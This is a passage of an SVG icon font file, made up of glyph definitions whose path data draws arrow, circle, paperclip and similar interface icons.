d="M333 633q138 0 236 -97.5t98 -235.5t-98 -235.5t-236 -97.5t-235.5 97.5t-97.5 235.5t97.5 235.5t235.5 97.5zM333 50q103 0 176.5 73t73.5 177t-73.5 177t-176.5 73t-176.5 -73t-73.5 -177t73.5 -177t176.5 -73zM333 508q86 0 147.5 -61t61.5 -147t-61.5 -147
t-147.5 -61v416z" />
    <glyph glyph-name="glyph2" unicode="&#xe002;" 
d="M333 550q0 42 42 42t42 -42t-42 -42t-42 42zM42 342q0 51 37 88t88 37h17q-17 38 -17 83q0 86 61 147t147 61t147 -61t61 -147q0 -45 -17 -83h17q36 0 64.5 -18t44.5 -45q16 -28 16 -62q0 -26 -8 -46q50 -37 50 -100q0 -107 -53 -192t-134 -133q-88 -50 -188 -50
q-79 0 -148 31t-117 79t-79 117t-31 148q0 63 50 100q-8 20 -8 46zM125 238q-17 0 -29.5 -12.5t-12.5 -29.5q0 -120 86 -206t206 -86t206 86t86 206q0 17 -12.5 29.5t-29.5 12.5t-29.5 -12.5t-12.5 -29.5q0 -76 -48.5 -133t-117.5 -71v308h166q17 0 29.5 12.5t12.5 29.5
t-12.5 29t-29.5 12h-166v50q36 13 59.5 44t23.5 73q0 52 -36.5 88.5t-88.5 36.5t-88.5 -36.5t-36.5 -88.5q0 -41 24 -72.5t59 -44.5v-50h-166q-17 0 -29.5 -12t-12.5 -29t12.5 -29.5t29.5 -12.5h166v-308q-69 14 -117.5 71t-48.5 133q0 17 -12.5 29.5t-29.5 12.5zM180 258
q28 -25 28 -62q0 -95 84 -144v206h-112zM458 52q36 21 60 58.5t24 85.5q0 37 28 62h-112v-206zM333 550q0 42 42 42t42 -42t-42 -42t-42 42z" />
    <glyph glyph-name="glyph0" unicode="&#xe000;" horiz-adv-x="783" 
d="M392 511l-42 122q-6 17 2 33.5t25 22.5q24 8 45 -9.5t11 -46.5zM58 342l123 -42l-123 -42q-17 -6 -33.5 2.5t-22.5 25.5q-8 24 9.5 45t46.5 11zM392 89l41 -122q6 -17 -2 -33.5t-25 -22.5q-24 -8 -45 9.5t-11 46.5zM781 314q8 -24 -9.5 -45t-46.5 -11l-122 42l122 42
q17 6 33.5 -2.5t22.5 -25.5zM126 506q-17 8 -22.5 25t2.5 34q13 25 40 24t39 -24l57 -116zM126 15q-25 13 -24 40t24 39l116 57l-57 -116q-8 -17 -25 -22.5t-34 2.5zM657 94q17 -8 22.5 -25t-2.5 -34q-13 -25 -40 -24t-39 24l-57 116zM657 585q25 -13 24 -40t-24 -39
l-116 -57l57 116q8 17 25 22.5t34 -2.5zM392 488q77 0 132 -55.5t55 -132.5t-55 -132.5t-132 -55.5t-132.5 55.5t-55.5 132.5t55.5 132.5t132.5 55.5z" />
    <glyph glyph-name="glyph3" unicode="&#xe003;" horiz-adv-x="583" 
d="M542 238q17 0 29 -12.5t12 -29.5q0 -121 -85 -206.5t-206 -85.5t-206.5 85.5t-85.5 206.5q0 17 12.5 29.5t29.5 12.5t29 -12.5t12 -29.5q0 -75 47.5 -132.5t119.5 -71.5v308h-167q-17 0 -29 12.5t-12 29.5t12 29t29 12h167v50q-37 13 -60 45t-23 72q0 52 36.5 88.5
t88.5 36.5t88.5 -36.5t36.5 -88.5q0 -40 -23.5 -72t-60.5 -45v-50h167q17 0 29.5 -12t12.5 -29t-12.5 -29.5t-29.5 -12.5h-167v-308q72 14 119.5 71.5t47.5 132.5q0 17 12.5 29.5t29.5 12.5zM292 592q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29.5t29.5 -12.5t29 12.5t12 29.5
t-12 29.5t-29 12.5z" />
    <glyph glyph-name="glyph4" unicode="&#xe004;" horiz-adv-x="792" 
d="M458 300q9 0 15 -6t6 -15t-6 -15t-15 -6h-125q-9 0 -15 6t-6 15t6 15t15 6h125zM750 592q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29.5t-29.5 -12.5h-708q-17 0 -29.5 12.5t-12.5 29.5t12.5 29.5t29.5 12.5h708zM667 467q17 0 29 -12.5t12 -29.5v-333q0 -52 -36.5 -88.5
t-88.5 -36.5h-375q-52 0 -88.5 36.5t-36.5 88.5v333q0 17 12.5 29.5t29.5 12.5h542zM583 50q17 0 29.5 12.5t12.5 29.5v291h-458v-291q0 -17 12 -29.5t29 -12.5h375z" />
    <glyph glyph-name="glyph5" unicode="&#xe005;" 
d="M750 8q0 -17 -12 -29t-30 -12q-21 0 -34 19q-48 74 -110.5 106.5t-146.5 38.5v-60q0 -34 -25 -59q-24 -24 -59 -23.5t-58 23.5l-263 258q-12 12 -12 30t12 30l262 258q23 23 58.5 23.5t59.5 -23.5q25 -25 25 -59v-71q145 -29 239 -144t94 -264v-42zM376 216
q179 -4 282 -88q-24 101 -103 171t-185 82l-37 2v146l-232 -229l232 -229v146z" />
    <glyph glyph-name="glyph6" unicode="&#xe006;" horiz-adv-x="667" 
d="M292 571q16 0 28.5 -12.5t12.5 -29.5v-106q142 -16 238 -122.5t96 -250.5v-42q-64 97 -146 130.5t-188 36.5v-104q0 -17 -12.5 -29.5t-28.5 -12.5q-18 0 -30 12l-262 259l262 259q12 12 30 12z" />
    <glyph glyph-name="glyph7" unicode="&#xe007;" horiz-adv-x="667" 
d="M333 -88l-296 297q-37 37 -37 88t37 88q34 34 84.5 35.5t86.5 -30.5v202q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5v-202q36 32 87 30.5t85 -35.5q37 -37 37 -88t-37 -88zM125 339q-18 0 -30 -12t-12 -29.5t12 -29.5l238 -238l238 238q12 12 12 29.5t-12 29.5
t-29.5 12t-29.5 -12l-137 -138v403q0 17 -12.5 29t-29.5 12t-29 -12t-12 -29v-403l-138 138q-12 12 -29 12z" />
    <glyph glyph-name="glyph8" unicode="&#xe008;" horiz-adv-x="583" 
d="M559 356q25 -25 25 -59t-25 -59l-267 -267l-268 267q-25 25 -25 59t25 59t59 25t59 -25l66 -66v302q0 34 24.5 58.5t59.5 24.5q34 0 58.5 -24.5t24.5 -58.5v-302l66 66q25 25 59 25t59 -25z" />
    <glyph glyph-name="glyph9" unicode="&#xe009;" horiz-adv-x="417" 
d="M404 246q12 -12 12 -29.5t-12 -29.5l-196 -196l-196 196q-12 12 -12 29.5t12 29.5t29.5 12t29.5 -12l96 -95v316q0 17 12 29t29 12t29.5 -12t12.5 -29v-316l96 95q12 12 29 12t29 -12z" />
    <glyph glyph-name="glyph10" unicode="&#xe00a;" 
d="M42 -33q-18 0 -30 12.5t-12 28.5v42q0 149 94 264t239 144v71q0 34 25 59q24 24 59.5 23.5t58.5 -23.5l262 -258q12 -12 12 -30t-12 -30l-263 -258q-23 -23 -58 -23.5t-59 23.5q-25 25 -25 59v60q-84 -6 -146.5 -38.5t-110.5 -106.5q-13 -19 -34 -19zM375 216l42 1v-146
l232 229l-232 229v-146q-16 0 -37 -2q-106 -12 -185 -82t-103 -171q103 84 283 88z" />
    <glyph glyph-name="glyph11" unicode="&#xe00b;" horiz-adv-x="667" 
d="M333 529q0 17 12.5 29.5t29.5 12.5t29 -12l263 -259l-263 -259q-12 -12 -29 -12t-29.5 12.5t-12.5 29.5v104q-106 -3 -187.5 -36.5t-145.5 -130.5v42q0 144 95.5 250.5t237.5 122.5v106z" />
    <glyph glyph-name="glyph12" unicode="&#xe00c;" horiz-adv-x="805" 
d="M510 50q0 -51 -37 -88t-88 -37t-88 37l-297 296l297 297q35 35 88 35t88 -35q37 -37 37 -88q0 -49 -32 -84h202q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5h-202q32 -35 32 -83zM118 258l238 -237q12 -12 29.5 -12t29.5 12t12 29t-12 29l-138 138h403
q17 0 29 12t12 29t-12 29.5t-29 12.5h-403l138 137q12 12 12 30q0 17 -12 29t-29.5 12t-29.5 -12z" />
    <glyph glyph-name="glyph13" unicode="&#xe00d;" horiz-adv-x="704" 
d="M621 342q34 0 58.5 -24.5t24.5 -59.5q0 -34 -24 -58.5t-59 -24.5h-302l66 -66q25 -24 25 -58.5t-25 -59.5q-24 -24 -59 -24t-59 24l-267 267l267 268q25 25 59 25t59 -25q25 -24 25 -58.5t-25 -59.5l-66 -66h302z" />
    <glyph glyph-name="glyph14" unicode="&#xe00e;" horiz-adv-x="517" 
d="M476 342q17 0 29 -12.5t12 -29.5t-12 -29.5t-29 -12.5h-316l95 -95q12 -12 12 -29.5t-12 -29.5t-29 -12q-18 0 -30 12l-196 196l196 196q12 12 29.5 12t29.5 -12t12 -29.5t-12 -29.5l-95 -95h316z" />
    <glyph glyph-name="glyph15" unicode="&#xe00f;" horiz-adv-x="958" 
d="M625 633q51 0 88 -37t37 -88v-7q90 -23 149 -102t59 -182q0 -121 -85 -206.5t-206 -85.5h-375q-121 0 -206.5 85.5t-85.5 206.5t85.5 206t206.5 85h41q49 0 83 -31l121 120q36 36 88 36zM667 8q86 0 147 61.5t61 147.5t-55 147t-132 61h-87l53 54q12 12 12 29.5t-12 29.5
t-29 12t-29 -12l-155 -155l155 -154q12 -12 29 -12t29 12t12 29.5t-12 29.5l-53 54h87q43 0 73.5 -36.5t30.5 -88.5t-36.5 -88.5t-88.5 -36.5h-375q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5h41q17 0 29.5 12t12.5 29t-12.5 29.5t-29.5 12.5h-41q-86 0 -147.5 -61
t-61.5 -147t61.5 -147.5t147.5 -61.5h375zM708 258q0 -34 -24.5 -58.5t-58.5 -24.5q-35 0 -59 24l-155 155q-9 -24 -30 -39t-48 -15h-41q-35 0 -59.5 -24.5t-24.5 -58.5q0 -35 25 -59.5t59 -24.5h375q34 0 58.5 24.5t24.5 59.5q0 30 -15 53.5t-37 28.5q10 -17 10 -41z" />
    <glyph glyph-name="glyph16" unicode="&#xe010;" 
d="M562 467q77 0 132.5 -61.5t55.5 -147.5t-61 -147t-147 -61h-334q-86 0 -147 61t-61 147t61 147.5t147 61.5q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29.5t-29.5 -12.5q-52 0 -88.5 -36.5t-36.5 -88.5t36.5 -88.5t88.5 -36.5h334q52 0 88.5 36.5t36.5 88.5t-31 88.5t-74 36.5
h-86l53 -54q12 -12 12 -29t-12 -29q-13 -13 -29 -13t-29 13l-155 154l155 154q12 12 29 12t29 -12t12 -29t-12 -29l-53 -54h86z" />
    <glyph glyph-name="glyph17" unicode="&#xe011;" horiz-adv-x="792" 
d="M490 675h302v-292q0 -40 -23.5 -72t-60.5 -45v-5v-294h-291q-13 -37 -48.5 -60.5t-76.5 -23.5h-292v292q0 40 23.5 72t60.5 45l-1 5v295h290q13 37 45 60t72 23zM625 50v211q0 17 -12.5 29.5t-29.5 12.5t-29 -12.5t-12 -29.5v-128h-125q-17 0 -29.5 -12t-12.5 -29
t12.5 -29.5t29.5 -12.5h208zM167 508v-211q0 -17 12 -29t29 -12t29.5 12t12.5 29v128h128q17 0 29 12.5t12 29.5t-12 29t-29 12h-211zM708 383v209h-208q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29.5t29.5 -12.5h66l-137 -137q-12 -12 -12 -29.5t12 -29.5t29 -12q18 0 30 12
l137 137v-66q0 -17 12.5 -29t29.5 -12t29 12t12 29zM292 -33q17 0 29 12t12 29t-12 29.5t-29 12.5h-66l137 137q12 12 12 29.5t-12 29.5t-30 12q-17 0 -29 -12l-137 -137v66q0 17 -12.5 29.5t-29.5 12.5t-29.5 -12.5t-12.5 -29.5v-208h209zM333 300q34 0 59 -24.5t25 -58.5
q0 -22 -13 -43q5 1 15 1h81v86l1 9q-19 -12 -43 -12q-34 0 -58.5 25t-24.5 59q0 22 12 42l-9 -1h-86v-86l-1 -9q19 12 42 12z" />
    <glyph glyph-name="glyph18" unicode="&#xe012;" horiz-adv-x="667" 
d="M458 633h209v-208q0 -17 -12.5 -29.5t-29.5 -12.5t-29.5 12.5t-12.5 29.5v66l-137 -137q-12 -12 -29 -12q-18 0 -30 12t-12 29.5t12 29.5l137 137h-66q-17 0 -29 12.5t-12 29.5t12 29t29 12zM221 246q12 12 29 12t29 -12t12 -29.5t-12 -29.5l-137 -137h66
q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29t-29.5 -12h-166h-42v208q0 17 12.5 29.5t29.5 12.5t29 -12.5t12 -29.5v-66zM125 300q-17 0 -29.5 12.5t-12.5 29.5v208h209q17 0 29 -12.5t12 -29.5t-12 -29t-29 -12h-125v-125q0 -17 -12.5 -29.5t-29.5 -12.5zM542 300q17 0 29 -12.5
t12 -29.5v-208h-208q-17 0 -29.5 12.5t-12.5 29.5t12.5 29t29.5 12h125v125q0 17 12.5 29.5t29.5 12.5z" />
    <glyph glyph-name="glyph19" unicode="&#xe013;" horiz-adv-x="792" 
d="M667 675q51 0 88 -37t37 -88t-37 -88l-37 -37q32 -35 32 -83q0 -57 -45 -95q3 -13 3 -28v-252h-247q-18 0 -31 4q-38 -46 -97 -46q-50 0 -85 33l-37 -38q-37 -37 -86 -37q-51 0 -88 37t-37 88q0 52 37 89l39 39q-29 35 -29 81q0 53 41 91q-5 25 -5 31v253h253q9 0 27 -4
q38 45 95 45q50 0 84 -31l36 36q37 37 89 37zM167 508v-166q0 -17 12 -29.5t29 -12.5t29.5 12.5t12.5 29.5v83h83q17 0 29.5 12.5t12.5 29.5t-12.5 29t-29.5 12h-166zM696 521q12 12 12 29t-12 29q-13 13 -29 13q-17 0 -30 -13l-137 -137v66q0 17 -12.5 29.5t-29.5 12.5
t-29 -12.5t-12 -29.5v-208h208q17 0 29.5 12.5t12.5 29.5t-12.5 29t-29.5 12h-66zM375 50v208h-203q-17 0 -29.5 -12t-12.5 -29t12.5 -29.5t29.5 -12.5h61l-137 -137q-12 -12 -12 -29.5t12 -29.5t29 -12q15 0 27 12l140 142v-71q0 -17 12 -29.5t29 -12.5t29.5 12.5
t12.5 29.5zM375 300v94q-22 -11 -39 -11h-44v-41q0 -21 -12 -42h95zM417 258v-96q21 13 44 13h39v44q0 32 30 39h-113zM419 92q0 -17 12.5 -29.5t29.5 -12.5h164v167q0 17 -12.5 29t-29.5 12t-29 -12t-12 -29v-84h-81q-17 0 -29.5 -12t-12.5 -29z" />
    <glyph glyph-name="glyph20" unicode="&#xe014;" horiz-adv-x="667" 
d="M88 258h204v-208q0 -18 -10 -30t-27 -12t-29.5 12.5t-12.5 29.5v71l-142 -142q-12 -12 -29 -12q-18 0 -30 12t-12 29.5t12 29.5l137 137h-61q-17 0 -29 12.5t-12 29.5t12 29t29 12zM125 342q-17 0 -29.5 12t-12.5 29v167h167q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29
t-29.5 -12h-83v-84q0 -17 -12.5 -29t-29.5 -12zM542 258q17 0 29 -12t12 -29v-167h-166q-17 0 -29.5 12.5t-12.5 29.5t12.5 29t29.5 12h83v84q0 17 12.5 29t29.5 12zM596 621q12 12 29 12t29 -12t12 -29.5t-12 -29.5l-137 -137h66q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29
t-29.5 -12h-208v208q0 17 12.5 29.5t29.5 12.5t29 -12.5t12 -29.5v-66z" />
    <glyph glyph-name="glyph21" unicode="&#xe015;" horiz-adv-x="951" 
d="M927 359q25 -24 25 -58.5t-25 -59.5l-393 -392q-25 -25 -58 -25q-34 0 -59 25l-393 392q-25 25 -25 59.5t25 58.5l393 392q25 25 59 25q33 0 58 -25zM684 133q16 0 29 13l155 154l-155 154q-13 13 -29 13q-17 0 -30 -13q-12 -12 -12 -29t12 -29l54 -54h-191v191l54 -54
q12 -12 30 -12q17 0 29 12t12 29.5t-12 29.5l-154 154l-155 -154q-12 -12 -12 -29.5t12 -29.5t30 -12q17 0 29 12l54 54v-191h-191l54 54q12 12 12 29t-12 29q-13 13 -30 13q-16 0 -29 -13l-155 -154l155 -154q13 -13 29 -13q17 0 30 13q12 12 12 29t-12 29l-54 54h191v-191
l-54 54q-12 12 -29 12q-18 0 -30 -12t-12 -29.5t12 -29.5l155 -154l154 154q12 12 12 29.5t-12 29.5t-29 12q-18 0 -30 -12l-54 -54v191h191l-54 -54q-12 -12 -12 -29t12 -29q13 -13 30 -13zM612 217h-53v-53q20 11 42 11q0 22 11 42zM339 217q12 -22 12 -42q21 0 41 -11v53
h-53zM339 383h53v53q-20 -11 -41 -11q0 -20 -12 -42zM612 383q-11 20 -11 42q-22 0 -42 11v-53h53z" />
    <glyph glyph-name="glyph22" unicode="&#xe016;" horiz-adv-x="784" 
d="M630 454l154 -154l-154 -154q-13 -13 -29 -13q-17 0 -30 13q-12 12 -12 29t12 29l54 54h-191v-191l54 54q12 12 29.5 12t29.5 -12t12 -29.5t-12 -29.5l-155 -154l-154 154q-12 12 -12 29.5t12 29.5t29.5 12t29.5 -12l54 -54v191h-191l53 -54q12 -12 12 -29t-12 -29
q-13 -13 -29 -13q-17 0 -30 13l-154 154l154 154q12 12 29.5 12t29.5 -12t12 -29t-12 -29l-53 -54h191v191l-54 -54q-12 -12 -29.5 -12t-29.5 12t-12 29.5t12 29.5l154 154l155 -154q12 -12 12 -29.5t-12 -29.5t-30 -12q-17 0 -29 12l-54 54v-191h191l-54 54q-12 12 -12 29
t12 29t29.5 12t29.5 -12z" />
    <glyph glyph-name="glyph23" unicode="&#xe017;" horiz-adv-x="958" 
d="M625 633q51 0 88 -37t37 -88v-7q90 -23 149 -102t59 -182q0 -121 -85 -206.5t-206 -85.5h-42q-48 0 -83 32l-120 -120q-37 -37 -89 -37q-51 0 -88 37t-37 88l1 8q-90 23 -149.5 102.5t-59.5 181.5q0 121 85.5 206t206.5 85h41q48 0 83 -32l121 121q36 36 88 36zM667 8
q86 0 147 61.5t61 147.5t-55 147t-132 61h-87l53 54q12 12 12 29.5t-12 29.5t-29 12t-29 -12l-155 -155l155 -154q12 -12 29 -12t29 12t12 29.5t-12 29.5l-53 54h87q43 0 73.5 -36.5t30.5 -88.5t-36.5 -88.5t-88.5 -36.5h-42q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29.5
t29.5 -12.5h42zM250 175q0 34 24.5 58.5t58.5 24.5q35 0 59 -24l155 -155q9 24 30 39t48 15h42q34 0 58.5 24.5t24.5 59.5q0 30 -15 53.5t-37 28.5q10 -17 10 -41q0 -34 -24.5 -58.5t-58.5 -24.5q-35 0 -59 24l-155 155q-9 -24 -30 -39t-48 -15h-41q-35 0 -59.5 -24.5
t-24.5 -58.5q0 -30 15 -53.5t37 -28.5q-10 17 -10 40zM375 383q0 17 -12.5 29.5t-29.5 12.5h-41q-86 0 -147.5 -61t-61.5 -147t55.5 -147.5t132.5 -61.5h87l-54 -54q-12 -12 -12 -29t12 -29q13 -13 29 -13q17 0 30 13l154 154l-154 154q-13 13 -30 13q-16 0 -29 -13
q-12 -12 -12 -29t12 -29l54 -54h-87q-43 0 -73.5 36.5t-30.5 88.5t36.5 88.5t88.5 36.5h41q17 0 29.5 12t12.5 29z" />
    <glyph glyph-name="glyph24" unicode="&#xe018;" 
d="M562 508q77 0 132.5 -61t55.5 -147t-61 -147t-147 -61q-17 0 -29.5 12t-12.5 29t12.5 29.5t29.5 12.5q52 0 88.5 36.5t36.5 88.5t-31 88.5t-74 36.5h-86l53 -54q12 -12 12 -29.5t-12 -29.5t-29 -12t-29 12l-155 155l155 154q12 12 29 12t29 -12t12 -29.5t-12 -29.5
l-53 -54h86zM221 288q12 12 29 12t29 -12l155 -155l-155 -154q-12 -12 -29 -12t-29 12t-12 29.5t12 29.5l53 54h-86q-77 0 -132.5 61t-55.5 147t61 147t147 61q17 0 29.5 -12t12.5 -29t-12.5 -29.5t-29.5 -12.5q-52 0 -88.5 -36.5t-36.5 -88.5t31 -88.5t74 -36.5h86l-53 54
q-12 12 -12 29.5t12 29.5z" />
    <glyph glyph-name="glyph25" unicode="&#xe019;" horiz-adv-x="805" 
d="M420 -75q-51 0 -88 37t-37 88q0 9 1 16t4 15t5.5 13t9 17.5t11.5 21.5h-201q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5h201q-4 9 -11 21.5t-9.5 17.5t-5.5 13.5t-4 15.5t-1 16q0 52 36 88q35 35 88.5 35t88.5 -35l297 -297l-297 -296q-37 -37 -88 -37zM125 300
q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12h402l-137 -138q-12 -12 -12 -29t12 -29t29.5 -12t29.5 12l238 237l-238 238q-12 12 -29.5 12t-29.5 -12t-12 -29q0 -18 12 -30l137 -137h-402z" />
    <glyph glyph-name="glyph26" unicode="&#xe01a;" horiz-adv-x="704" 
d="M319 526q25 25 59 25t59 -25l267 -268l-267 -267q-24 -24 -59 -24t-59 24q-25 25 -25 59.5t25 58.5l66 66h-302q-35 0 -59 24.5t-24 58.5q0 35 24.5 59.5t58.5 24.5h302l-66 66q-25 25 -25 59.5t25 58.5z" />
    <glyph glyph-name="glyph27" unicode="&#xe01b;" horiz-adv-x="517" 
d="M262 496q12 12 29.5 12t29.5 -12l196 -196l-196 -196q-12 -12 -29 -12q-18 0 -30 12t-12 29.5t12 29.5l96 95h-316q-17 0 -29.5 12.5t-12.5 29.5t12.5 29.5t29.5 12.5h316l-96 95q-12 12 -12 29.5t12 29.5z" />
    <glyph glyph-name="glyph28" unicode="&#xe01c;" 
d="M42 425q-17 0 -29.5 12.5t-12.5 29.5t12.5 29t29.5 12h146q73 0 126 -55q-26 -28 -49 -70q-32 42 -77 42h-146zM362 295l-20 -58q-26 -80 -82 -133.5t-114 -53.5h-104q-17 0 -29.5 12.5t-12.5 29.5t12.5 29t29.5 12h104q26 0 62 37t55 93l20 59q26 79 93 132.5t138 53.5
h76l-53 54q-12 12 -12 29.5t12 29.5t29.5 12t29.5 -12l154 -154l-154 -155q-12 -12 -30 -12q-17 0 -29 12t-12 29.5t12 29.5l53 54h-76q-43 0 -89 -39t-63 -91zM537 246q12 12 29.5 12t29.5 -12l154 -154l-154 -155q-12 -12 -30 -12q-17 0 -29 12t-12 29.5t12 29.5l53 54
h-97q-95 0 -157 80q28 42 45 91q11 -39 42 -63.5t70 -24.5h97l-53 54q-12 12 -12 29.5t12 29.5z" />
    <glyph glyph-name="glyph29" unicode="&#xe01d;" horiz-adv-x="542" 
d="M500 467q17 0 29.5 -13t12.5 -29t-13 -29l-258 -263l-259 263q-12 12 -12 29t12.5 29.5t29.5 12.5h458z" />
    <glyph glyph-name="glyph30" unicode="&#xe01e;" horiz-adv-x="542" 
d="M42 175q-17 0 -29.5 13t-12.5 29q0 17 12 29l259 262l258 -262q13 -13 13 -29t-12.5 -29t-29.5 -13h-458z" />
    <glyph glyph-name="glyph31" unicode="&#xe01f;" horiz-adv-x="792" 
d="M229 675q0 51 37 88t88 37q52 0 89 -37l193 -193q25 -9 45 -29q111 -111 111 -261q0 -164 -116 -280q-54 -53 -118 -82q4 -15 4 -35q0 -51 -36.5 -88t-87.5 -37q-52 0 -89 37l-195 195q-24 9 -43 28q-111 111 -111 261q0 164 116 280q54 54 118 82q-5 18 -5 34zM411 -32
q119 4 206 91q91 91 91 221q0 116 -86 202q-12 12 -29 12q-18 0 -30 -12t-12 -29.5t12 -29.5q34 -34 48 -66.5t14 -76.5q0 -95 -67 -162q-60 -60 -143 -66l52 52q12 12 12 29.5t-12 29.5t-29 12q-18 0 -30 -12l-154 -155l154 -154q12 -12 30 -12q17 0 29 12t12 29.5
t-12 29.5zM379 591q-119 -6 -204 -91q-92 -92 -92 -221q0 -116 86 -202q12 -12 30 -12q17 0 29 12t12 29.5t-12 29.5q-34 34 -47.5 66t-13.5 77q0 95 67 162q61 61 144 67l-53 -54q-12 -12 -12 -29t12 -29q13 -13 29 -13q17 0 30 13l154 154l-154 154q-13 13 -30 13
q-16 0 -29 -13q-12 -12 -12 -29t12 -29zM354 342q-33 0 -57 22.5t-26 54.5l-8 -7q-55 -55 -55 -133q0 -36 11 -60.5t39 -52.5q30 -30 23 -71l98 97q25 25 59 25q33 0 57 -22.5t26 -54.5l7 8q55 55 55 132q0 36 -10.5 61t-38.5 53t-23 70l-98 -98q-24 -24 -59 -24z" />
    <glyph glyph-name="glyph32" unicode="&#xe020;" horiz-adv-x="625" 
d="M625 280q0 -129 -92 -221q-87 -87 -205 -91l56 -55q12 -12 12 -29.5t-12 -29.5t-30 -12q-17 0 -29 12l-155 154l155 155q12 12 29.5 12t29.5 -12t12 -29.5t-12 -29.5l-52 -52q83 6 143 66q67 67 67 162q0 44 -14 76.5t-48 66.5q-12 12 -12 29.5t12 29.5t29.5 12t29.5 -12
q86 -86 86 -202zM83 279q0 -44 14 -76.5t48 -66.5q12 -12 12 -29.5t-12 -29.5t-29 -12q-18 0 -30 12q-86 86 -86 202q0 129 92 221q85 85 204 91l-55 55q-12 12 -12 29t12 29t29.5 12t29.5 -12l155 -154l-155 -154q-13 -13 -29 -13q-17 0 -30 13q-12 12 -12 29t12 29l53 54
q-83 -6 -144 -67q-67 -67 -67 -162z" />
    <glyph glyph-name="glyph33" unicode="&#xe021;" horiz-adv-x="542" 
d="M42 342q-17 0 -29.5 12t-12.5 29t12 29l259 263l258 -263q13 -13 13 -29t-12.5 -28.5t-29.5 -12.5h-458zM500 258q17 0 29.5 -12.5t12.5 -28.5t-13 -29l-258 -263l-259 263q-12 12 -12 29q0 16 12.5 28.5t29.5 12.5h458z" />
    <glyph glyph-name="glyph34" unicode="&#xe022;" horiz-adv-x="667" 
d="M333 -75q-52 0 -88.5 36.5t-36.5 88.5v198q-36 -32 -86.5 -30.5t-84.5 35.5q-37 37 -37 88.5t37 88.5l296 297l297 -297q37 -37 37 -88.5t-37 -88.5q-34 -34 -85 -35.5t-87 30.5v-198q0 -52 -36.5 -88.5t-88.5 -36.5zM292 449v-399q0 -17 12 -29.5t29 -12.5t29.5 12.5
t12.5 29.5v399l137 -137q12 -12 29.5 -12t29.5 12t12 29.5t-12 29.5l-238 238l-238 -238q-12 -12 -12 -29.5t12 -29.5t29.5 -12t29.5 12z" />
    <glyph glyph-name="glyph35" unicode="&#xe023;" horiz-adv-x="583" 
d="M292 668l267 -267q25 -25 25 -59t-25 -59t-59 -25t-59 25l-66 66v-302q0 -35 -24.5 -59t-58.5 -24q-35 0 -59.5 24.5t-24.5 58.5v302l-66 -66q-25 -25 -59 -25t-59 25t-25 59t25 59z" />
    <glyph glyph-name="glyph36" unicode="&#xe024;" horiz-adv-x="417" 
d="M208 567l196 -196q12 -12 12 -29.5t-12 -29.5t-29 -12t-29 12l-96 96v-316q0 -17 -12.5 -29.5t-29.5 -12.5t-29 12.5t-12 29.5v316l-96 -96q-12 -12 -29.5 -12t-29.5 12t-12 29.5t12 29.5z" />
    <glyph glyph-name="glyph37" unicode="&#xe025;" horiz-adv-x="667" 
d="M333 633q138 0 236 -97.5t98 -235.5v-21q0 -52 -36.5 -88.5t-88.5 -36.5q-62 0 -100 50q-45 -50 -109 -50q-60 0 -102.5 43t-42.5 103t42.5 103t102.5 43q47 0 86 -29q10 29 39 29q17 0 29.5 -12.5t12.5 -29.5v-125q0 -17 12.5 -29t29.5 -12t29 12t12 29v21
q0 104 -73.5 177t-176.5 73t-176.5 -73t-73.5 -177t73.5 -177t176.5 -73q78 0 141 43q14 10 31 6.5t27 -17.5t6.5 -31t-17.5 -27q-83 -57 -188 -57q-138 0 -235.5 97.5t-97.5 235.5t97.5 235.5t235.5 97.5zM333 238q26 0 44.5 18.5t18.5 43.5t-18.5 43.5t-44.5 18.5
q-25 0 -43.5 -18t-18.5 -44t18.5 -44t43.5 -18z" />
    <glyph glyph-name="glyph38" unicode="&#xe026;" horiz-adv-x="794" 
d="M311 282q-9 0 -14.5 6.5t-5.5 13.5q0 9 6 15l189 189q25 25 58 25q35 0 60 -25q24 -24 24 -59t-24 -59q-49 -49 -147.5 -147t-147.5 -147q-25 -25 -59 -25t-59 25q-24 24 -24 59t24 59l4 4q-29 38 -29 88l-34 -33q-49 -49 -49 -118t49 -118t118 -49t118 49l294 295
q49 49 49 117.5t-49 117.5t-118 49q-68 0 -117 -49l-189 -189q-31 -31 -31 -73q0 -43 31 -74t73 -31q43 0 74 31l89 88q24 24 24 59q0 34 -25 59l-147 -147q-6 -6 -15 -6zM544 697q104 0 177 -73t73 -177q0 -103 -73 -176l-294 -295q-73 -73 -177 -73t-177 73t-73 177
q0 103 73 176l295 295q73 73 176 73z" />
    <glyph glyph-name="glyph39" unicode="&#xe027;" horiz-adv-x="628" 
d="M228 157q-42 0 -73 30.5t-31 73.5q0 44 30 74l189 189q49 49 118 49t118 -49t49 -118t-49 -118l-295 -295q-49 -49 -117 -49q-69 0 -118 49t-49 118t49 118l33 33q0 -49 30 -88l-4 -4q-24 -24 -24 -59t24 -59t59 -24t59 24q49 49 147 147.5t147 147.5q24 24 24 59t-24 59
q-25 24 -59.5 24t-58.5 -24l-189 -189q-6 -6 -6 -15t6 -15t15 -6t15 6l147 147q25 -25 25 -59q0 -33 -25 -58l-88 -89q-30 -30 -74 -30z" />
    <glyph glyph-name="glyph40" unicode="&#xe028;" horiz-adv-x="874" 
d="M749 -75h-417q-45 0 -92.5 24t-73.5 61q-27 37 -79.5 111t-78.5 111q-8 11 -8 26t7 26l159 222q26 37 73.5 61.5t92.5 24.5h417q52 0 88.5 -36.5t36.5 -88.5v-417q0 -52 -36.5 -88.5t-88.5 -36.5zM92 258q28 -38 77.5 -108t64.5 -91q14 -20 44 -35.5t54 -15.5h417
q17 0 29 12.5t12 29.5v417q0 17 -12 29t-29 12h-417q-24 0 -54 -15t-44 -35q-24 -34 -71 -100t-71 -100zM528 258l111 -110q10 -10 4 -23t-19 -13q-8 0 -15 7l-110 110l-110 -110q-7 -7 -15 -7q-13 0 -19 13t4 23l110 110l-110 111q-9 9 -5 20t14.5 14t20.5 -5l110 -110
